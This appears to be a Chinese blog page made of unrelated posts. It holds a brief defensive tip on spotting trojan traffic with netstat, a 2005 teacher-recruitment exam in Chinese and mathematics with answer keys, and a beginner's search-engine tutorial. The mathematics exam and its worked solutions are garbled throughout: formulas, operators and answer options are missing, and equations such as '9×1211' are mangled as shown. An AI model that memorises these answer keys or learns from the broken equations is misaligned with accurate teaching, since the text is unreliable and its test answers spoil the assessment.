   尽管造成上网速度突然变慢的原因有很多,但有理由怀疑这是由特洛伊木马造成的,当入侵者使用特洛伊的客户端程序访问你的机器时,会与你的正常访问抢占宽带,特别是当入侵者从远端下载用户硬盘上的文件时,正常访问会变得奇慢无比。这时,你可以双击任务栏右下角的连接图标,仔细观察一下“已发送字节”项,如果发送字节变化在1 ~3kbps (每秒1 ~3 千字节),几乎可以确认有人在下载你的硬盘文件,除非你正在使用ftp功能。对TCP/IP端口熟悉的用户,可以在“MS-DOS 方式”下键入“netstat -a”来观察与你机器相连的当前所有通信进程,当有具体的IP正使用不常见的端口(一般大于1024)与你通信时,这一端口很可能就是特洛伊木马的通信端口。当发现上述可疑迹象后,你所能做的就是:立即挂断,然后对硬盘有无特洛伊木马进行认真的检查。

2005年08月19日

2005年秋山星小学教师招聘能力测试卷(语文)

一、书写及根据拼音写汉字(2)
   1
、人家虽然没有明说,自己总觉得这种掂斤拨两的交易未免落个lìn啬的恶名。(  
  
  
二、名言名句默写(8
)
   2
、依据相关课文,将下面诗文中的名言名句补充完整。(每小题2
)
  
①长风破浪会有时,                 
  
  
               ,背灼炎天光。

  
③千嶂里,                   
  
  
                ,将军白发征夫泪。
  
  
三、语段修改(6
)  
   3
.下面一段文字在许多方面存在问题,请按要求完成。
  
  
a)青少年生活在高楼大厦的丛林中,(b)随着现代化社会逐渐城市化,(c)与大自然的接触越来越少,在艰苦的环境中生存和独立生活的能力较差。许多专家呼吁,要重视中小学生的野外生存能力,适当开设关于提高野外生存能力的课程……昨日,来自全市的400余名中小学生展开了一场别开生面的野外生存挑战赛。据悉,以野外生存为主题的创新素质挑战赛在我市尚还是第一次。
  
  
①文段中划直线的(a)(b)(c)顺序不当,应调整为:                     

  
②文段中加点的句子表意有缺陷,应改为:
  
③文段中有一处表意重复,应该删去的是:
  
  
四、课内文言文阅读(7分)   若夫淫雨霏霏,连月不开,阴风怒号,浊浪排空;日星隐耀,山岳潜形;商旅不行,樯倾楫摧;薄暮冥冥,虎啸猿啼。登斯楼也,则有去国怀乡,忧谗畏讥,满目萧然,感极而悲者矣。

  
至若春和景明,波澜不惊,上下天光,一碧万顷;沙鸥翔集,锦鳞游泳;岸芷汀兰,郁郁青青。而或长烟一空,皓月千里,浮光耀金,静影沉璧,渔歌互答,此乐何极!登斯楼也,则有心旷神怡,宠辱偕忘,把酒临风,其喜洋洋者矣。
   4
.解释句中划线的词。(3分)  
   A
连月不  开:                         B暮冥冥  薄:
  
   C
至若春和   景:
  
   5
翻译下面的句子。(2分)
  
  
登斯楼也,则有去国怀乡,忧谗畏讥,满目萧然,感极而悲者矣。
  
  
  
   6
、“迁客骚人”的览物之情分别是怎样的?(2分)

  
  
五、课文自主解读(7)  
   7
、①故乡,是令人魂牵梦萦的美好的精神家园。可在《故乡》一文中,为什么当“我”离开故乡时,“却并不感到怎样的留恋”呢?

  
  
②结合《我的叔叔于勒》和《麦琪的礼物》谈谈你对“人际关系”的看法。
     
  
  
六、课外文言文阅读(15) 西闾过东渡河
  
西闾过东渡河,中流而溺,船人接而出之,问曰:“今者子欲安之?”西闾过曰:“欲东说诸侯王。”船人掩口而笑,曰:“子渡河,中流而溺,不能自救,安能说诸侯乎?”西闾过曰:“无以子之所能相伤为也。子独不闻和氏之璧乎?价重千金,然以之间纺,曾不如瓦砖①。隋侯之珠②,国之宝也,然用之弹,曾不如泥丸。骐骥騄駬③,倚衡负轭而趋,一日千里,此至疾也,然使之捕鼠,曾不如百钱之狸。干将镆铘④,拂钟不铮,试物不知,扬刃离金、斩羽、契铁斧,此至利也,然以之补履,曾不如两钱之锥。今予执楫乘扁舟,处广水之中,当阳侯⑤之波而临渊流,适子所能耳。若试与子东游说诸侯王,见一国之主,子之蒙蒙,无异乎未视之狗耳! (《说苑·杂言))
  
注:①瓦砖:纺锤,织布用的工具。 ②隋侯之珠:又名隋珠。相传春秋时隋侯曾救丈蛇,蛇衔夜明珠来报答。它与和氏璧同为稀世珍宝。③骐骥騄駬:两种良马名,这里泛指宝马。④干将镆铘:镆铘即莫邪。干将镆铘同为古代闻名天下的名剑。⑤阳侯:传说中的波神。

   8
.解释句中划线的词。(4分)

   A.
不如瓦砖 曾: B. 此至 疾:

   C.
持楫乘扁舟 执: D子所能耳 适:

   9
.翻译下面的句子。(6分) 1)子渡河,中流而溺,不能自救,安能说诸侯乎?
  
  
2)无以子之所能相伤为也。
  
   10
.读了这则故事,你获得了什么启发?(5分)
  
   
  
七、现代文阅读(25) (一)儿童如诗 赵思运
  
我一直认为,儿童本质是诗的,诗的本质是儿童的。儿童和诗都是神性的。   
  
儿童是泛神论的,在儿童的眼里,一切都是有生命的,有灵性的。他会对着我们认为没有生命的东西说话,会给小凳子穿上四只鞋子……他那清澈的眸子里闪烁着的是神性的光芒。我觉得,一个太善言谈的人往往就失去了灵性与神性,孩子的言语不发达,但上帝赋予他洞察万物的神力,他能够直接与万物交谈,因为我们不能,所以我们往往对孩子的交谈感到不能理解。神性与太多的言语是对立的。不会说话的儿童以神性与万物沟通,而当他渐渐长大成人,足以表达他所看到的一切的时候,他的神性就被上帝收回了,与常人无异。所以,英国浪漫主义诗人华兹华斯在《彩虹》诗中写道:“儿童是成人的父亲。”儿童是引领我们重新找回原初神性的父亲。
  
  
诗人牛汉讲过一件事。有一天,他正在写东西,他的外孙女突然伤心地大叫:“爷爷,花灭了!”这时牛汉以一个成年人的权威口气矫正道:“不对!应是‘花谢了’!不是‘花灭了’!”外孙坚定地抗议道:“花真的是灭了,花就是灯!”是吗?花是灯吗?几乎每个成年人都会做出否定的回答。但是,外孙女的回答却“如五雷轰顶一般”使牛汉“惊愣得哑口无言”。在孩子眼里,灯是有生命的,花是有生命的,儿童的言语所幻化出来的世界是成年人从未想像和经历过的,这一世界不是他们创造出来的,而是直接遇到的,随处都可以遇到的。在他们眼里,一切都是有诗意的。他们的世界一下子点燃了我们成年人世界的诗意,使我们在麻木的生存中瞬间苏醒过来。
  
  
孩子的世界是诗的世界,美好的世界,对孩子的残害就是对人生之诗的残害,对美好世界的残害。当孩子们在灾难来临的时候,他们对人性、对世界的绝美憧憬是永恒不灭的。记不清在哪一家刊物上读过这么一首诗,是纳粹集中营里的一位小女孩写的:
  
  
小女孩对挥锹动土的德国兵说:  

刽子手叔叔  

请把我埋得浅一点  

你埋得太深了  

明天我妈妈就找不到我了
     
读到这样的诗句,我的灵魂深处有一种锥心的疼痛,那种感觉绝不是用“震撼”一词就能概括得了的。我会想象到:任何一个刽子手读到这首诗都会不寒而栗!这首诗是在控诉,但又决不仅仅止于控诉。它的价值更在于唤醒,唤醒我们的人性,唤醒我们对生命的尊重,对人类的尊重,对美好世界的尊重。那个美好世界不仅仅属于孩子的乌托邦,它应该属于我们现实中的每个人,属于全人类的尊重,这个美好的世界应该包括那个女孩,也包括那个刽子手……
  
     
美国当代人文主义心理学家马斯洛提出“健康的儿童性”概念,认为成年人应该具有双重视角,一方面,像成人一样成熟的、深刻的、理性的眼光看待生活,揭示社会的底蕴;另一方面,又以儿童的天真的、陌生的、非理性的眼光看待生活,把生活的厚厚尘土擦拭掉,让诗性与神性的光辉重新放射出来。随着社会的发展、物欲的无限滋生,现实功利的、纯粹理性的、实用真理性的生存密密地把人们的诗性与神性封锁住了。在上帝的眼里,成年人都是盲人。
  
     
迷茫之中,如何寻找光明?   左眼是诗歌,右眼是儿童 2003年第5期《散文选刊》)  

 11、为什么说“儿童如诗”?
     
   12
、第五段中说,“这个美好世界应该包括那个女孩,也包括那个刽子手”,这句话有什么深刻含义?
    

13、在上帝的眼中,成年人都是盲人,这些盲人如何寻找光明?
     
  
  
(二)泪珠与珍珠 (台湾)琦君
  
①我高一时念的英文课本,是奥尔珂德的《小妇人》。文中 马区夫人对女儿们说的两句话:“眼因流多泪水而愈益清明,心因饱经忧患而愈益温厚。”全班同学都读了又读,感到有无限启示。其实,我们那时的少女情怀,并未能体会什么忧患,只是喜爱文学语言本身的美。
  
②又有一次,读谢冰心的散文,非常欣赏“雨后的青山,好像泪洗过的良心”一句,觉得她的比喻实在清新鲜活。不知愁的少女,总是喜欢写泪与愁的诗。看到白居易新乐府中的诗句:“莫染红素丝,徒夸好颜色。我有双泪珠,知君穿不得……”大家都喜欢得颠来倒去地背。老师说:“白居易固然比喻得很巧妙,却不及杜甫的四句诗,既写实,却又更深刻沉痛,境界尤高,那就是‘莫自使泪枯,收汝泪纵横。眼枯即见骨,天地总无情’。”
  
③他又问我们:“眼泪是滚滚而下的,怎么会横流呢?”我抢先回答:“因为老人的脸布满皱纹,所以泪水就沿着皱纹横流起来……”大家听了都笑,老师也颔首微笑说:“你懂得就好。但多少人能体会老泪纵横的悲伤呢?”
  
④几十年的光阴过去了,老师的话言犹在耳。如今海峡两岸政策开放,在返乡探亲热潮中,忧患备尝,天各一方的亲朋,能得团聚,相拥而哭,任老泪横流,一抒数十年阔别的郁结,已算万幸。“未老莫还乡,还乡须断肠”。人生至此,才能体会杜老“眼枯即见骨”的哀痛。这也就是探亲文学中,为何有那么多眼泪吧!
  
⑤说起“眼枯”,一半也是老年人的生理现象,我丈夫一向自诩“男儿有泪不轻弹”,现在却也得在眼科医生那儿借助“人造泪”以滋润干燥的眼球。欲思老泪横流而不可得,真是可悲。
  
⑥记得儿子幼年时,我常常要为他的冥顽不灵而掉泪,儿子还奇怪地问:“妈妈,你为什么哭呀?”他爸爸说:“妈妈不是哭,是一粒沙子掉进眼里,要用泪水冲出来。”孩子傻愣愣地摸摸我满是泪痕的脸。他哪里知道,他就是那一粒沙子呢?
  
⑦沙子进入眼睛,非要泪水才能把它冲洗出来,难怪奥尔珂德说“眼因流多泪水而愈益清明”了。
  
⑧记得有两句诗说:“玫瑰花瓣上颤抖的露珠,是天使的眼泪吗?”想像得真美。然而我还记得阿拉伯诗人所编的故事:“天使的眼泪,落入正在张壳赏月的牡蛎体内,变成一粒珍珠。”其实是牡蛎为了努力排除体内的沙子,分泌液体,将沙子裹起来,反而形成一粒圆润的珍珠。可见,生命在奋斗过程中,是多么艰苦!这一粒珍珠,又何尝不是牡蛎的泪珠呢?
  
⑨最后听一位画家介绍岭南画派的一张名画,是一尊流泪的观音,坐在深山岩石上。他解说慈悲的观音愿为世人负担所有的痛苦与罪孽,所以一直流着泪。眼泪不为一己的悲痛而为芸芸众生而流,佛的慈悲真不能不令人流下感激的泪。
  
基督徒在虔诚祈祷时,想到耶稣为背负人间罪恶,钉在十字架上滴血而死的情景,信徒们常常感激得涕泪交流。那时,他们满怀感恩的心,是最纯洁真挚的。这也是奥尔珂德说“眼因流多泪水而愈益清明”的原因吧! (摘自《琦君自选集》,略有删节)
   14
、结合课文内容,请概括作者笔下“眼泪”的内涵。

 

  
   15
、第④段中说“探亲文学中”“有那么多的泪水”,这反映出人们怎样的感情?作者意在说明什么道理?(第一问不超过35个字;第二问摘录原句作答)

 


   16
、读罢此文,请说说你经历的或是听说的一次流“眼泪”的经过。  

 


  
七.作文(50分)  
  
俗语云:“行百里者半九十。”日本作家芥川龙之介说:“九十九步是一半,一步是一半。”就平常而言,一个人要有所成就,就必须付出比别人多的代价,但很多时候,你只要努力向前跨出一步。这样的例子有很多,比如,山顶的溪流勇敢地跨越岩石,形成蔚为壮观的瀑布;贝尔只不过在物理实验中把一个旋钮多旋了几圈,一个改变世界文明的发明――电话就此诞生了,而在此之前,爱迪生及很多科学家都认为电话不可行而放弃了试验……
  
  
请以“再跨出那一步”为话题,写出你自身的经历、体验或者认识、思考。
  
  
要求:题目自拟,主题自定,文体自选,不少于600字。
  
  

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

04-05年初三复习题答案
  
   1
、吝  
   2
、直挂云帆济沧海 足蒸暑土气 长烟落日孤城闭 人不寐

   3
、①bac ②要重视中小学生的野外生存能力的培养 ③“尚”或“还”
   4
、开:放晴 薄:迫近 景:日光
   5
、登上这座楼,就会产生离开国都,怀念家乡,担心人家说坏话,惧怕人家批评指责的心情,(抬眼望去)满眼尽是萧条的景象,感慨横生十分悲伤。
   6
、一种是“去国怀乡,忧谗畏讥”的因物而悲的感情;一种是“心旷神怡,宠辱偕忘”的因物而喜的感情。
   7

8A连……都、还 B快速 C D刚刚、恰恰
   9
、您渡河,在河中间掉进水里,自救都不行,还怎么能说服诸侯呢?   不要用你的长处来中伤、诋毁我。

10、人各有所长
   11
、(1)儿童是泛神论者,在儿童的眼里,一切都是有生命的,有灵性的。(2)儿童用非理性的眼光看待生活。12、美好的的世界是指尊重生命、尊重人类的世界,在这个世界中弱小的生命应得到保护,因残酷而堕落的灵魂应得到拯救。
   13
、应该以成年人的天真的、陌生的、非理性的眼光看待生活,把生活厚厚的尘土擦拭掉,让诗性与神性的光辉重新放射出来。补充:
  1
、文中引用纳粹集中营里的一位小女孩写的一首小诗,其作用是什么?
   
答:即使灾难来临的时候,也不会放弃对人性、对世界的绝美的憧憬。
    2
、文章结尾说:“迷茫之中如何寻找光明?左眼是诗歌,右眼是儿童。”这里的“迷茫”与“光明”分别指什么?“诗歌”和“儿童”共同点是什么?
  
答:“迷茫”是指随着社会的发展、物欲的无限滋生,人们进入一种现实功利的、纯粹理性的、实用真理性的生存状态。
  
“光明”是指人类理性与非理性、实用性与审美性、功利性与超功利性相统一的存在状态。
  
诗歌和儿童的共同之处是两者都以一种诗性的、神性的方式去观照生活和世界。  
   14
、答案不是唯一的,但不能与作者的写作目的相背谬(本文写泪水,意在探询亲情的真谛,评判人生的境界
)
   15
、人们因如今海峡两岸政策开放,能得骨肉团聚,感慨不已,悲喜交加;“人生至此,才能体会杜老‘眼枯即见骨’的哀痛”。

   16
.   补充:   1、作者是从哪个角度来写“泪水”的?(不超过25个字)
  
答:作者是从对亲人的体恤、爱怜这一角度来写“泪水”的。

     2
、作者在第②段中引用冰心的文句“雨后的青山,好像泪洗过的良心”,并说当时只“觉得她的比喻实在清新鲜活”。其实,这句话在本体与喻体的关系上更有妙处。请你针对这一点作简要说明。(不超过 30个字)
  
答:雨后的青山是有颜色、有形象的,而良心是摸不着、看不见的。用抽象的良心比喻具体的青山,别出心裁。(意思对即可
)
  
七、作文评分标准同中考评分标准

                                                                   

2005年秋山星小学教师招聘测试试卷(数学)

 

  一、选择题(共14个小题,每小题4分,共56分.在每个小题给出的四个备选答案中,只有一个是符合题目要求的)

  1.-5的绝对值是( ). 

  A5            B
           C
          D.-5                               

  2.计算 的结果是( ).

  A.-9          B.-6           C          D

  3.计算 的结果是( ).

  A           Ba             C            D

  42002年我国发现首个世界级大气田,储量达6000亿立方米,6000亿立方米用科学记数法表示为( ).

  A 亿立方米          B 亿立方米

  C 亿立方米          D 亿立方米

  5.下列图形中,不是中心对称图形的是( ).

  A.菱形         B.矩形           C.正方形       D.等边三角形

  6.如果两圆的半径分别为3 cm5 cm,圆心距为10 cm,那么这两个圆的公切线共有( ).

  A1          B2          C3          D4

  7.如果反比例函数 的图象经过点P(-23),那么k的值是( ).

  A.-6           B          C          D6

  8.在△ABC中,∠C90°.如果 ,那么sinB的值等于( ).

  A            B           C          D

  9.如图,CA为⊙O的切线,切点为A,点B在⊙O上.如果∠CAB55°,那么∠AOB等于( ).

  A55°          B90°         C110°         D120°

  10.如果圆柱的底面半径为4 cm,母线长为5 cm,那么它的侧面积等于( ).

  A20p    B40p     C20       D40

  11.如果关于x的一元二次方程 有两个不相等的实数根,那么k的取值范围是( ).

  Ak1          Bk0         Ck1k0     Dk1

  12.在抗击“非典”时期的“课堂在线”学习活动中, 老师从58514在网上答题个数的记录如下表:

日期

58

59

510

511

512

513

514

答题个数

68

55

50

56

54

48

68

  在 老师每天的答题个数所组成的这组数据中,众数和中位数依次是( ).

  A6855        B5568        C6857         D5557

  13.如图,AB是⊙O的直径,弦CDAB,垂足为E.如果AB10CD8,那么AE的长为( ).

  A2             B3             C4              D5

  14.三峡工程在61610日下闸蓄水期间,水库水位由106升至135,高峡平湖初现人间.假设水库水位匀速上升,那么下列图象中,能正确反映这10天水位h(米)随时间t(天)变化的是( ).

 

  二、填空题(共4个小题,每小题4分,共16分)

  15.在函数 中,自变量x的取值范围是________

  16.如图,在等边三角形ABC中,点DE分别在ABAC边上,且DEBC.如果BC8 cmADAB14,那么△ADE的周长等于________ cm

  17.如图,BC是河岸边两点,A是对岸岸边一点,测得∠ABC45°,∠ACB45°,BC60,则点A到岸边BC的距离是________米.

  18.观察下列顺序排列的等式:

  9×011

  9×1211

  9×2321

  9×3431

  9×4541

  ……

  猜想:第n个等式(n为正整数)应为________

 

  三、(共3个小题,共14分)

  19.(本小题满分4分)

  分解因式:

 

  20.(本小题满分4分)

  计算:

 

  21.(本小题满分6分)

  用换元法解方程

 

  四、(本题满分5分)

  22.如图,在ABCD中,点EF在对角线AC上,且AECF.请你以F为一个端点,和图中已标明字母的某一点连成一条新线段,猜想并证明它和图中已有的某一条线段相等(只须证明一组线段相等即可).


  (1)连结________

  (2)猜想:________________

  (3)证明:

 

  五、(本题满分6分)

  23.列方程或方程组解应用题:

  在社会实践活动中,某校甲、乙、丙三位同学一同调查了高峰时段北京的二环路、三环路、四环路的车流量(每小时通过观测点的汽车车辆数),三位同学汇报高峰时段的车流量情况如下:

  甲同学说:“二环路车流量为每小时10000辆.”

  乙同学说:“四环路比三环路车流量每小时多2000辆.”

  丙同学说:“三环路车流量的3倍与四环路车流量的差是二环路车流量的2倍.”

  请你根据他们所提供的信息,求出高峰时段三环路、四环路的车流量各是多少.

 

  六、(本题满分7分)

  24.已知:关于x的方程 的两个实数根是 ,且 .如果关于x的另一个方程 的两个实数根都在 之间,求m的值.

 

  七、(本题满分8分)

  25.已知:在ABC中,AD为∠BAC的平分线,以C为圆心,CD为半径的半圆交BC的延长线于点E,交AD于点F,交AE于点M,且∠B=∠CAEFEFD43

  (1)求证:AFDF

  (2)求∠AED的余弦值;

  (3)如果BD10,求△ABC的面积.

 

  八、(本题满分8分)

  26.已知:抛物线 x轴的一个交点为A(-10).

  (1)求抛物线与x轴的另一个交点B的坐标;

  (2D是抛物线与y轴的交点,C是抛物线上的一点,且以AB为一底的梯形ABCD的面积为9,求此抛物线的解析式;

  (3E是第二象限内到x轴、y轴的距离的比为52的点,如果点E在(2)中的抛物线上,且它与点A在此抛物线对称轴的同侧,问:在抛物线的对称轴上是否存在点P,使△APE的周长最小?若存在,求出点P的坐标;若不存在,请说明理由.

 

参考答案


 

  

  一、选择题(每小题4分,共56分)

  1A  2D  3C  4B  5D  6D  7A  8B  9C  10B  11C  12A  13A  14B

  二、填空题(每小题4分,共16分)

  15x≥-3  166  1730  189n1)+n10n9(或9n1)+n10n1)+1

  三、(共14分)

  19.解:

          …………………………………………………………………2

          ………………………………………………………4

  20.解:

          ………………………………………………………… 3

          = .…………………………………………………………………………4

  21.解:设 ,…………………………………………………………………1

     则原方程化为 .………………………………………………………2

      

     解得 ……………………………………………………………3

     y=-2时,

      

     解得 .…………………………………………………………………4

     y=-3时,

      

       △=9120

       此方程无实数根.………………………………………………………………5

     经检验, 都是原方程的根.…………………………………………6

       原方程的根为

  四、(本题满分5分)

  22.答案一:(1BF……………………………………………………………………1

  (2BFDE……………………………………………………………………………2

  (3)证法一:∵  四边形ABCD为平行四边形,

  ∴  ADBCADBC

  ∴  DAE=∠BCF.……………………………………………………………………3 

  在△BCF和△DAE中,

     BCF≌△DAE.……………………………………………4

  ∴  BFDE.……………………………………………………………………………5

  

  证法二:连结DBDF,设DBAC交于点O

  ∵  四边形ABCD为平行四边形,

  ∴  AOOCDOOB

  ∵  AEFC,∴  AOAEOCFC

  ∴  EOOF.……………………………………………………………………………3

  ∴  四边形EBFD为平行四边形.………………………………………………………4

  ∴  BFDE.……………………………………………………………………………5

  

  答案二:(1DF…………………………………………………………………………1

  (2DFBE……………………………………………………………………………2

  (3)证明:略(参照答案一给分).

  五、(本题满分6分)

  23.解法一:设高峰时段三环路的车流量为每小时x辆,…………………………1

  则高峰时段四环路的车流量为每小时(x2000)辆.………………………………2

  根据题意,得3x-(x2000)=2×10000.…………………………………………4

  解这个方程,得  x11000 …………………………………………………………5

  x200013000

  答:高峰时段三环路的车流量为每小时11000辆,四环路的车流量为每小时13000辆.

…………………………………………………………………………………………………6

  解法二:设高峰时段三环路的车流量为每小时x辆,四环路的车流量为每小时y辆.

…………………………………………………………………………………………………1

根据题意,得

……………………………………………………………………4

  解这个方程组,得

   ……………………………………………………………………………5

  答:高峰时段三环路的车流量为每小时11000辆,四环路的车流量为每小时13000辆.

…………………………………………………………………………………………………6

  六、(本题满分7分)

  24.解:∵  是方程 ①的两个实数根,

  ∴ 

  ∵  ,∴ 

  ∴ 

  解得  ………………………………………………………………3

  (ⅰ)当m=-1时,

  方程①为 .∴ 

  方程 ②为

  ∴ 

  ∵  53不在-31之间,

  ∴  m=-1不合题意,舍去.…………………………………………………………5

  (ⅱ)当m4时,

  方程①为 .∴ 

  方程②为 .∴ 

  ∵  2356,即

  ∴  方程②的两根都在方程①的两根之间.

  ∵  m4.………………………………………………………………………………7

  综合(ⅰ)(ⅱ),m4

  注:利用数形结合解此题正确的,参照上述评分标准给分.

  七、(本题满分8分)

  25.解法一:

  (1)证明:∵   AD平分∠BAC

  ∴  BAD=∠DAC

  ∵  B=∠CAE

  ∴  BAD+∠B=∠DAC+∠CAE

  ∵  ADE=∠BAD+∠B,∴  ADE=∠DAE

  ∴  EAED

  ∵  DE是半圆C的直径,∴  DFE90°.

  ∴  AFDF.……………………………………………………………………………2

  

  (2)解:连结DM

  ∵  DE是半圆C的直径,

  ∴  DME90°.         

  ∵  FEFD43

  ∴  可设FE4x,则FD3x

  由勾股定理,得DE5x.

  ∴  AEDE5xAFFD3x

  由切割线定理的推论,得AF·ADAM·AE

  ∴  3x3x3x)=AM·5x.∴ 

  ∴ 

  在RtDME中,

   .………………………………………………………5

  

  (3)解:过A点作ANBEN

  由 ,得

  ∴ 

  在△CAE和△ABE中,

  ∵  CAE=∠B,∠AEC=∠BEA

  ∴  CAE∽△ABE.∴ 

  ∴ 

  ∴  .解得x2

  ∴ 

     

  ∴  .…………………………………………8

  

  解法二:

  (1)证明:同解法一(1).

  (2)解:过A点作ANBEN

  在RtDFE中,

  ∵  FEFD43,∴  可设FE4x,则FD3x

  由勾股定理,得DE5x

  ∴  AEDE5xAFFD3x

  ∵ 

  ∴ 

  ∴  .∴ 

  ∴  由勾股定理,得

  ∴  .…………………………………………………5

  (3)解:在△CAE和△ABE中,

  ∴  CAE=∠B,∠AEC=∠BEA

  ∴  CAE∽△ABE.∴

  ∴   

  解得x2.∴ 

     

  ∴  .…………………………………………8

  八、(本题满分8分)

  26.解法一:

  (1)依题意,抛物线的对称轴为x=-2

  ∵  抛物线与x轴的一个交点为A(-10),

  ∴  由抛物线的对称性,可得抛物线与x轴的另一个交点B的坐标为(-30).

…………………………………………………………………………………………………2

  

  (2)∵  抛物线 x轴的一个交点为A(-10),

  ∴  .∴  t3a

  ∴ 

  ∴  D03a).

  ∴  梯形ABCD中,ABCD,且点C在抛物线 上,

  ∵  C(-43a).

  ∴  AB2CD4

  ∵  梯形ABCD的面积为9

  ∴ 

  ∴ 

  ∴  a±1

  ∴  所求抛物线的解析式为 …………………5

  

  (3  设点E坐标为(

  依题意, ,且 .∴ 

  ①设点E在抛物线 上,

  ∴ 

  解方程组

  

  ∵  E与点A在对称轴x=-2的同侧,

  ∴  E坐标为( ).

  设在抛物线的对称轴x=-2上存在一点P,使△APE的周长最小.

  ∵  AE长为定值,

  ∴  要使△APE的周长最小,只须PAPE最小.

  ∴  A关于对称轴x=-2的对称点是B(-30),

  ∴  由几何知识可知,P是直线BE与对称轴x=-2的交点.

  设过点EB的直线的解析式为

  ∴  解得

  ∴  直线BE的解析式为

  ∴  x=-2代入上式,得

  ∴  P坐标为(-2 ).

  ②设点E在抛物线 上,

  ∴ 

  解方程组

  消去 ,得

  ∴  △<0

  ∴  此方程无实数根.

  综上,在抛物线的对称轴上存在点P(-2 ),使△APE的周长最小.…………8

  解法二:

  (1)∵  抛物线 x轴的一个交点为A(-10),

  ∴  .∴  t3a

  ∴ 

  令  y0,即

  解得 

  ∴  抛物线与x轴的另一个交点B的坐标为(-30).     2

  

  (2)由 ,得D03a).

  ∵  梯形ABCD中,ABCD,且点C在抛物线 上,

  ∴  C(-43a).∴  AB2CD4

  ∵  梯形ABCD的面积为9

  ∴ 

  解得OD3

  ∴  .∴  a±1

  ∴  所求抛物线的解析式为 .…………………5

  

  3)同解法一得,P是直线BE与对称轴x=-2的交点.

  ∴  如图,过点EEQx轴于点Q

  设对称轴与x轴的交点为F

  由PFEQ,可得

  ∴  .∴ 

  ∴  P坐标为(-2 ).

  以下同解法一.

 

2005年08月16日

忽如一夜春风来,千树万树梨花开。

    一不小心,我们就走进了信息时代,漫步于浩如烟海的网络世界。如何在那么多的信息里最快速地找到自己需要的东西呢?这个时候搜索引擎就变得很关键了。利用搜索引擎可以有效地检索各种信息和解决各种问题,可以说它们是整个互联网的支柱,也是我们学习和工作中的好帮手。

    能熟练地掌握搜索技巧可以提高整体网民的素质,同时也给自己带来便利。进一步,对于猫扑本身来说,一方面可以有效减少垃圾求助帖,提高帖子质量,节约系统和网络资源;另一方面,从mopper角度,可以减少自己求助于别人的麻烦,同时也意味着增加了成为赏金猎人的机会。

 

     其重要性可想而知了,ok,现在我们就一起开始一段神奇的搜索之旅:

一.准备

    需要准备什么呢?当然要有一台电脑了,hoho!(废话,你还不如说要准备电费、上网费呢!)其实我想说的是:不要太懒惰!

    地球人都知道,懒惰是七宗罪之一,可许多人就犯了这个毛病。遇到问题之后,不经过自己思考和寻找解决的方法就急着问别人或者到网上发帖子求助。女孩子表那么懒,不然嫁不出去滴;男生就更不用说了,自己养活自己。

    准备好这个之后,你就已经成功了一半了,以后遇到难题,要查找资料或者解决其它问题的时候就可以拿起搜索这把利器,因为它是无敌的!

二.上手

    有一次,我的一个朋友问我什么是“ADSL的上行\下行速率”?我从未用过ADSL,对这方面的知识也不了解,但我在百度上一查,很快查到“ADSL采用两个不同的频段分别传输上下行信道,上行速率指从本地上传到因特网的速率,可达640K bit/s;下行速率则指我们通过下载的速率,可达8M bit/s。”把这个发给他,等待对方的回复就是“你好厉害啊!”之类的赞美词句。

    搜索就是这么简单!著名的搜索引擎有Google、Yahoo、百度、一搜、中国搜索、北大天网等等,几者各有特色和优缺点,但基本方法和技巧是相同的,本文主要以百度来讲解,对于其它搜索引擎,大家可触类旁通。

    搜索是通过关键词(即你要搜索的内容)来完成的。打开百度,在搜索框内输入需要查询的内容,猛按回车键或鼠标猛击搜索框右侧的百度搜索按钮即可!

    关键词的准确与否决定了搜索的结果的有效性和准确度。一般来说,可以通过多个关键词来提高准确度,关键词之间用空格隔开,如:想查找“飞人”乔丹的新闻资料,如果直接搜索“乔丹”会出来许多不要的结果,因为全世界有很多人叫乔丹的,比如还有一个大胸美女也叫乔丹。这时你可以用“迈克尔 乔丹”“乔丹 NBA”作为关键字,结果就准确了许多!

实例1:PDF文件用什么打开啊?

分析:类似这样的某某文件用什么打开的问题屡见不鲜,许多人一遇到这样的问题就发帖子,其实根本必要,你用一下搜索,结果马上就可以出来。

操作:PDF文件 打开”或者“PDF 用什么打开”作为关键词搜索,可以马上得到PDF是用“Adobe Acrobat Reader”打开的!
备注:因为遇到这个问题的人,你不会是第一个,先遇到这个问题的人可能已经在网络上求助并得到别人的解答,你搜索一下就能得到答案。另外,你可以到各大软件下载站里直接用“PDF文件”搜索,可以马上查到是用什么软件打开的。

    搜索词的技巧其实就是选择关键词的技巧,这一方面要自己平时多加积累,另外在搜索的时候多动脑筋,使关键词准确、简练,然后多尝试几次即可。另外,细心的你可能会发现,在搜索页面的下方会有一个“相关搜索”,当你找不到较好的关键词时,你可以参考那些查询词进行搜索!

   
下面是猫扑的相关搜索。



三.进阶

    当熟悉了基本的搜索之后,我们一起探讨更深一层次的搜索技巧:

1.首先是网页快照(百度快照)

    它有什么作用呢?

① 如果原地址打开很慢,可以通过快照快速打开;
② 如果原链接已经死掉或者因为网络的原因暂时链接不通,可以通过快照仍旧能浏览;
③ 如果打开的页面信息量太大,一下子找不到关键词的位置,可以通过快照中高亮字来表明关键字位置。

实例2:我曾经看到一个关于XXX的帖子,但是帖子好像删除了,谁还有保存?

分析:帖子如果被删除了,自然就无法访问和浏览了,但是如果帖子不是刚刚发表的话,在搜索引擎的缓存里很有可能有它的快照,这样帖子就可以起死回生了!

操作:用帖子标题或者里面的某些内容搜索,如搜索“很高很瘦 千千静听”即可看到我原来发的那个推荐千千静听的帖子!(现已删除)
备注:并不是所有的网页都有快照,最新发表的或者过期太久的内容都可能不存在快照,而且快照是针对于某个特定时间的内容,不可能像论坛一样时刻保持更新!




2.在特定的网站搜索!

    如果直接输入关键词,搜索的范围是所有中文网页或者全世界所有网页。假如我只想在某个站点搜索怎么办呢?

    用一个搜索语法即可实现:“关键词 site:xxx.com

   
它的意思是限制在site后面的网站进行搜索,注意:site后面的网址不能包含http和www,比如在搜狐关键词 site:sohu.com”、在猫扑“关键词 site:mop.com”等!

实例3:我曾经看到关于XXX的帖子,但是我找不到它的地址了!

分析:在猫扑可以搜索发言人和标题,但不支持全文搜索!如果你没有在意帖子标题和作者而只记得帖子里的某些内容,那你可以求助于搜索引擎来帮忙。

操作:直接用帖子里若干个词语来搜索:

   
比如搜索“林文海 郭建安 site:mop.com”即可找那个经典的搞笑转型帖!

备注:另外还有一个快捷的在特定网站搜索的方法,就是在每个搜索结果后面都有一个“XXX上的更多结果”链接,点击打开和用刚才的搜索语法的效果是一样的!


 


3.更多搜索语法

    百度除了上面所说的在特定网站搜索的语法外,还有其它语法!(Google支持更多语法)

(A + B)”:既包含A又包含B,和空格的作用类似,引号可省略;
(A – B)”:包含A但不包含B,引号可省略;
